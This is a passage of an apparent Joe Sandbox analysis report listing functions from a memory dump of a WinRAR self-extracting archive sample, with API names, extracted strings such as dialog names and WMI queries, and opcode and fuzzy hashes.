                                      • Opcode Fuzzy Hash: d1f70ab6d0ae8b3084d51eef4787e874430d0504aa66550a33771c8389bfad96
                                      • Instruction Fuzzy Hash: 0A41D576B06B0299EB00CF64E5803E937A9EF48798F480676DA4CE3B69EE38D555C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                       Memory Dump Source
                                       • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                      • API String ID: 2565136772-3242537097
                                      • Opcode ID: fdee9745a353db95c9b4b27806cffd46c0390e42e013dce2f99bb91082c79cfb
                                      • Instruction ID: c875859a1e6dd252acf6426b6bd6a9259c57a692e6b6e781cc7cf372be59e3cb
                                      • Opcode Fuzzy Hash: fdee9745a353db95c9b4b27806cffd46c0390e42e013dce2f99bb91082c79cfb
                                      • Instruction Fuzzy Hash: B0212164F1AA0796FF14DFA0EA9517527A1AF8878CF4C01B5D91EE27A0DF3CE5458340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                       Memory Dump Source
                                       • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                      • String ID: DXGIDebug.dll$UNC$\\?\
                                      • API String ID: 4097890229-4048004291
                                      • Opcode ID: 2b62bd64c3bbf903d9ade41e2b83ec1f9261fa72456887eaafe308be92646ed5
                                      • Instruction ID: 462d67d2c616722c860ef493c01dc3f4f7463879f8c2626ec5297f713d1cef03
                                      • Opcode Fuzzy Hash: 2b62bd64c3bbf903d9ade41e2b83ec1f9261fa72456887eaafe308be92646ed5
                                      • Instruction Fuzzy Hash: 7912DC22B09A4280EB14DB69E4441AD6372EF85BCCF584272DA5DE7BE9DF3CD549C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                       Memory Dump Source
                                       • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                      • String ID: GETPASSWORD1$Software\WinRAR SFX
                                      • API String ID: 431506467-1315819833
                                      • Opcode ID: f5510aebd172c9ec0c15d2c3426bb18c7e90e40235729a4241aa0d5830a32387
                                      • Instruction ID: fe0c21c5d463b8bcc93e75b55d4e7dd259e15beed5b01631431c307da16fbc16
                                      • Opcode Fuzzy Hash: f5510aebd172c9ec0c15d2c3426bb18c7e90e40235729a4241aa0d5830a32387
                                      • Instruction Fuzzy Hash: D7B1AE62F19B8289FB009BA4E4842AC2362AF4539CF584275DE5CF7AD9DE3CE546C344
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                       Memory Dump Source
                                       • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                      • API String ID: 3215553584-2617248754
                                      • Opcode ID: a60231409e47c1a5672abfa229f1b0c42138c6649af1949bad2eb6332146811d
                                      • Instruction ID: a8f5da67bf4430d261e166384e84dbabc2f6053ab285b94367afdfc63408e9ed
                                      • Opcode Fuzzy Hash: a60231409e47c1a5672abfa229f1b0c42138c6649af1949bad2eb6332146811d
                                      • Instruction Fuzzy Hash: 96419D72A0AB458DEB40CF25E8417A933A4EF18398F194576EE5CE3B54DE3CD025C344
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                       Memory Dump Source
                                       • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                      • String ID: STATIC
                                      • API String ID: 781704138-1882779555
                                      • Opcode ID: 0a32551ddf3b327544de21b3e538b695597bcc4fc0cc33eb1cc93d7c3056c0d2
                                      • Instruction ID: 4739420bc3c6d693e42f656e17974ac36d7112dcfb2d7daa609efcd89022b78d
                                      • Opcode Fuzzy Hash: 0a32551ddf3b327544de21b3e538b695597bcc4fc0cc33eb1cc93d7c3056c0d2
                                      • Instruction Fuzzy Hash: 8831EF25B08A52C6FA60AB12E8017B923A2BF89BC8F584070DD4EE7B55DE3CE5078740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                       Memory Dump Source
                                       • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                      • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                      • API String ID: 2721297748-1533471033
                                      • Opcode ID: 27a1c77f5fc281c8209104d1890cdbac340ca96cb5bdc4f2b0dec88e7dbf10f4
                                      • Instruction ID: 90e965b2dfbdafb511d2a565dd12250c23b29147e268ca0771854a8741a7917b
                                      • Opcode Fuzzy Hash: 27a1c77f5fc281c8209104d1890cdbac340ca96cb5bdc4f2b0dec88e7dbf10f4
                                      • Instruction Fuzzy Hash: 6A81AF62F19A4285FB00DBA5D8502ED6372AF4578CF480576DE1DF7A99EE38D606C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                       Memory Dump Source
                                       • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Item$Text
                                      • String ID: LICENSEDLG
                                      • API String ID: 1601838975-2177901306
                                      • Opcode ID: 1a30000b72e84f8ba6293dbf14933a0a72ddbc058ae9ffcbcc0226747817138c
                                      • Instruction ID: 48f61b78d60c231263d451528ab40f2b7ccb20c5c007f1c8a1d5e651eb3398b1
                                      • Opcode Fuzzy Hash: 1a30000b72e84f8ba6293dbf14933a0a72ddbc058ae9ffcbcc0226747817138c
                                      • Instruction Fuzzy Hash: E7418F25F08B56C2FB549B55F8547792762AF84F88F5C02B5D90EE7BA4CF3CA6468300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: AddressProc$CurrentDirectoryProcessSystem
                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                      • API String ID: 2915667086-2207617598
                                      • Opcode ID: 0287272f6ced8d38123369f0e78f7e516f0e1226113c6a7574fd01a02cbcf18c
                                      • Instruction ID: c6c73a680e78e02a1a2a99602671517ff84629c1d242a913352be852b2011d2e
                                      • Opcode Fuzzy Hash: 0287272f6ced8d38123369f0e78f7e516f0e1226113c6a7574fd01a02cbcf18c
                                      • Instruction Fuzzy Hash: 1D316920A4AB4786FA14DF16E9501752BA1FF49B9CF0D02B5C84EE33A0EF7CE5418B40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: $
                                      • API String ID: 3668304517-227171996
                                      • Opcode ID: 5700efd69fbe91ad63471e00e5e4e78b95961d0656bab2311fdadc64f94d29dc
                                      • Instruction ID: 58b0c59129820c93144aa12db0e851637cd9057a5532ee3de45f0b961f6a6e4b
                                      • Opcode Fuzzy Hash: 5700efd69fbe91ad63471e00e5e4e78b95961d0656bab2311fdadc64f94d29dc
                                      • Instruction Fuzzy Hash: 27F1BD62F1574280EE049B69D4881BC2B62AF45BACF585671CA5DE7BD5EF7CE2C0C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                      • String ID: csm$csm$csm
                                      • API String ID: 2940173790-393685449
                                      • Opcode ID: 3e10ce34ec1ec2318b4e5d1a096f68ad678d9ed54216a6dc3b478c18613d0621
                                      • Instruction ID: bb65bbda7117c3acdf08db3029c1f68bd87667732abd680efa7f69656cbacc8d
                                      • Opcode Fuzzy Hash: 3e10ce34ec1ec2318b4e5d1a096f68ad678d9ed54216a6dc3b478c18613d0621
                                      • Instruction Fuzzy Hash: 7CE1AE72A0A7838AEB209F64D4903AD7BA0FF44B5CF184175DA8DE7696DF38E585C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: AllocClearStringVariant
                                      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                      • API String ID: 1959693985-3505469590
                                      • Opcode ID: 408e286e95d7be2333e7e980e9c5bf6a4dc44dd0e8b0d4c37376681f41bb0957
                                      • Instruction ID: 06a03c3deced7fc5e21cdc4fefd8aec4f9d0fa7e58a7d7da617c7df041b9db5c
                                      • Opcode Fuzzy Hash: 408e286e95d7be2333e7e980e9c5bf6a4dc44dd0e8b0d4c37376681f41bb0957
                                      • Instruction Fuzzy Hash: DC711776A14B0689EB20CF25E9805AD7BB4FF88B9CB485172EA4ED3B64CF38D144C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF65A387473,?,?,?,00007FF65A3851DE,?,?,?,00007FF65A385199), ref: 00007FF65A3872F1
                                      • GetLastError.KERNEL32(?,?,00000000,00007FF65A387473,?,?,?,00007FF65A3851DE,?,?,?,00007FF65A385199), ref: 00007FF65A3872FF
                                      • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF65A387473,?,?,?,00007FF65A3851DE,?,?,?,00007FF65A385199), ref: 00007FF65A387329
                                      • FreeLibrary.KERNEL32(?,?,00000000,00007FF65A387473,?,?,?,00007FF65A3851DE,?,?,?,00007FF65A385199), ref: 00007FF65A38736F
                                      • GetProcAddress.KERNEL32(?,?,00000000,00007FF65A387473,?,?,?,00007FF65A3851DE,?,?,?,00007FF65A385199), ref: 00007FF65A38737B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                      • String ID: api-ms-
                                      • API String ID: 2559590344-2084034818
                                      • Opcode ID: c3b9cc9cdd52f2350940838b7b06db5a4f889f983fd09e5162c1733cb5f95556
                                      • Instruction ID: cdc049bad6d083509ca447ea38288b6bb7926f0c1796d02e0785dcc4ee26a924
                                      • Opcode Fuzzy Hash: c3b9cc9cdd52f2350940838b7b06db5a4f889f983fd09e5162c1733cb5f95556
                                      • Instruction Fuzzy Hash: B6312221A1BA4385EE119B12A8006792796FF48BA8F0D0574ED1DFB390EF7CE0408340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNEL32(?,?,?,00007FF65A3814F3,?,?,?,00007FF65A3818AA), ref: 00007FF65A3815AB
                                      • GetProcAddress.KERNEL32(?,?,?,00007FF65A3814F3,?,?,?,00007FF65A3818AA), ref: 00007FF65A3815C8
                                      • GetProcAddress.KERNEL32(?,?,?,00007FF65A3814F3,?,?,?,00007FF65A3818AA), ref: 00007FF65A3815E4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                      • API String ID: 667068680-1718035505
                                      • Opcode ID: b86a11e47b759afb9776b5a8196b9ce040a12c050a3cc6a343a5a4dac9788fc5
                                      • Instruction ID: 477647af97aafbacb522dabb9fa3c5064f9a36f3a2d1e0cbc56c5522dbbd4438
                                      • Opcode Fuzzy Hash: b86a11e47b759afb9776b5a8196b9ce040a12c050a3cc6a343a5a4dac9788fc5
                                      • Instruction Fuzzy Hash: BF112D20E0BB0785FEA18F01EA4027562D16F4879CF4C55B5C99EE6350EF3CE4948250
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF65A365164: GetVersionExW.KERNEL32 ref: 00007FF65A365195
                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF65A355ABC), ref: 00007FF65A36ED0C
                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF65A355ABC), ref: 00007FF65A36ED18
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF65A355ABC), ref: 00007FF65A36ED28
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF65A355ABC), ref: 00007FF65A36ED36
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF65A355ABC), ref: 00007FF65A36ED44
                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF65A355ABC), ref: 00007FF65A36ED85
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion
                                      • String ID:
                                      • API String ID: 2092733347-0
                                      • Opcode ID: fd651a404897a6a4441ea403f02956d6baa9a0eb7a17f9813df5aa7066cb431e
                                      • Instruction ID: 4b88ecaec4f59ae0b50f929d9eac9885247912c51f6830a4ca0a42501de796cf
                                      • Opcode Fuzzy Hash: fd651a404897a6a4441ea403f02956d6baa9a0eb7a17f9813df5aa7066cb431e
                                      • Instruction Fuzzy Hash: 7C5149B2B146518EEB14CFA9E4441AC37B1FB48B88B64403ADE4DA7B58DF38D555C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion
                                      • String ID:
                                      • API String ID: 2092733347-0
                                      • Opcode ID: 75a8bc4378bee31fccdfb2974230a450bdf33b57f85e7c22afbcf2edf14db1b8
                                      • Instruction ID: 49ce06409514fbb77d2cbdf61de80e1788c87b344144e8bbf6959b90fa124d6c
                                      • Opcode Fuzzy Hash: 75a8bc4378bee31fccdfb2974230a450bdf33b57f85e7c22afbcf2edf14db1b8
                                      • Instruction Fuzzy Hash: A7312762B10A518EEB04CFB5E8801AC7770FF1875CB58502AEE4EE7A58EF38D895C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: .rar$exe$rar$sfx
                                      • API String ID: 3668304517-630704357
                                      • Opcode ID: f7e8776bebfea627073bc17617381cc0f273a4aee0f23fed37c477de479a6e90
                                      • Instruction ID: 90e73c860e02a6b08b27fc53084da5b6c4c064a41abd051e846d4977e7b58e71
                                      • Opcode Fuzzy Hash: f7e8776bebfea627073bc17617381cc0f273a4aee0f23fed37c477de479a6e90
                                      • Instruction Fuzzy Hash: 68A1E422A14A4240EB049F25D8452BC2B61FF84B9CF985276CE1EE77E9DF3CE581C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: abort$CallEncodePointerTranslator
                                      • String ID: MOC$RCC
                                      • API String ID: 2889003569-2084237596
                                      • Opcode ID: ab04bccd114fd37ee07c78e6a8355f7d33a779087ea2a313566685aba8f4470c
                                      • Instruction ID: ff69936875aa08891f57563e678909cc939cf2c109f6590e479224eec286065f
                                      • Opcode Fuzzy Hash: ab04bccd114fd37ee07c78e6a8355f7d33a779087ea2a313566685aba8f4470c
                                      • Instruction Fuzzy Hash: 80918073A09B828AE710CB65E8502AD7BA0FB4478CF18417AEE8DE7B55DF38D195C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                      • String ID: csm$f
                                      • API String ID: 2395640692-629598281
                                      • Opcode ID: ec9dc00a1498f0518f52aab0520fd36c16a5f49c97d71af4407016564852814a
                                      • Instruction ID: 003c675413d27b5626b3ac30b41c822a7f1724c5408b5a1b03ad58536ea31db0
                                      • Opcode Fuzzy Hash: ec9dc00a1498f0518f52aab0520fd36c16a5f49c97d71af4407016564852814a
                                      • Instruction Fuzzy Hash: 3851D172A1A6038AEB54CF21E454A29B795FF40B8CF588174DE1EE7788DF79E841C780
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                      • API String ID: 2102711378-639343689
                                      • Opcode ID: 2d61f48e4c913df30e3353f33d0da5b87e2c753f517db7d0e57962c29196d97f
                                      • Instruction ID: 27f876e7e810e9089aee00d79931f778d142ea283ec6c1e28ef8ae7014eb00c8
                                      • Opcode Fuzzy Hash: 2d61f48e4c913df30e3353f33d0da5b87e2c753f517db7d0e57962c29196d97f
                                      • Instruction Fuzzy Hash: 4651D262F0974285FA10DB69D8412BD67A1AF897ECF0801B1DE5DF36A6DF3CE885C210
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Window$Show$Rect
                                      • String ID: RarHtmlClassName
                                      • API String ID: 2396740005-1658105358
                                      • Opcode ID: 4e548477031c14a7251255e9d330dc60e120dd1539dff70d7855af105dc2f50a
                                      • Instruction ID: c9b621ee0dec156f491d58b08a6f69f38f9391f0ff33c94a22a43fdee08a77b5
                                      • Opcode Fuzzy Hash: 4e548477031c14a7251255e9d330dc60e120dd1539dff70d7855af105dc2f50a
                                      • Instruction Fuzzy Hash: 9D51E322A09B828AEB249F25F44437A67A1FF88B88F184171DE8ED7B55DF3CE1058700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                      • String ID: sfxcmd$sfxpar
                                      • API String ID: 3540648995-3493335439
                                      • Opcode ID: 0be8ce0403185fc1deac6cdf8be0278e7ad32d04fc55896583981b8fcfcf6579
                                      • Instruction ID: c7a5e0a854af2dbdb333c3eb5c5669cc7fa08d06f702ff6b904cdb1be9b79913
                                      • Instruction Fuzzy Hash: ED316B62E14B1684EB04CF69E8851AC2371FF88B9CF581175DE5DE7BA9DE38E182C344
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID:
                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                      • API String ID: 0-56093855
                                      • Opcode ID: fc5be3ed44ea404419216795f56c086f61d8a3e370be94283853cacc62a44369
                                      • Instruction ID: c739437baf20b0adbdd26c9bd0f57bcf7364ba0bd180e16c2093ed49e85941b9
                                      • Instruction Fuzzy Hash: 6821D460A0AF4BC1FA108B19E84417427A2FF49B8CF5C06B6D98DE7261DE3CE686C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: f98038199561589234cc2a21183cce8921094221fb9f21f9ab19275f87f72e7e
                                      • Instruction ID: 672a6ca8647d815a1915b548f84e926b65872337f9183031beda21d559dbecca
                                      • Instruction Fuzzy Hash: F3F06261A2AA4385EF448F11F54027D6760EFC8798F4C1076E94FD6664DF3CD585C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID:
                                      • API String ID: 3215553584-0
                                      • Opcode ID: c065245cb44755ae58ebfe43422878115c1e571edfc284914e4b515b233c21cc
                                      • Instruction ID: d0417a80ff2f69e3de459f963cea1f2bec7be717d49e081907dab939c6bf1a80
                                      • Instruction Fuzzy Hash: 7681ED62E186568DFB609F659A806BD27A0BF44B8CF0842B5CE0EE3795CF3CE445C710
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2398171386-0
                                      • Opcode ID: 0409cd116d85bacbe2180f28ba98f9a497d20aba58dbcceb72ddb26471a66f34
                                      • Instruction ID: f928f12688fe82ef7aa181b3b0de355e7eeed8244b96ca1e700e571b72595be5
                                      • Instruction Fuzzy Hash: 1751B122F08A4259FB54CFB5E4402BD67B1AF897ACF084675EE1DE77D8EE3890598300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 3659116390-0
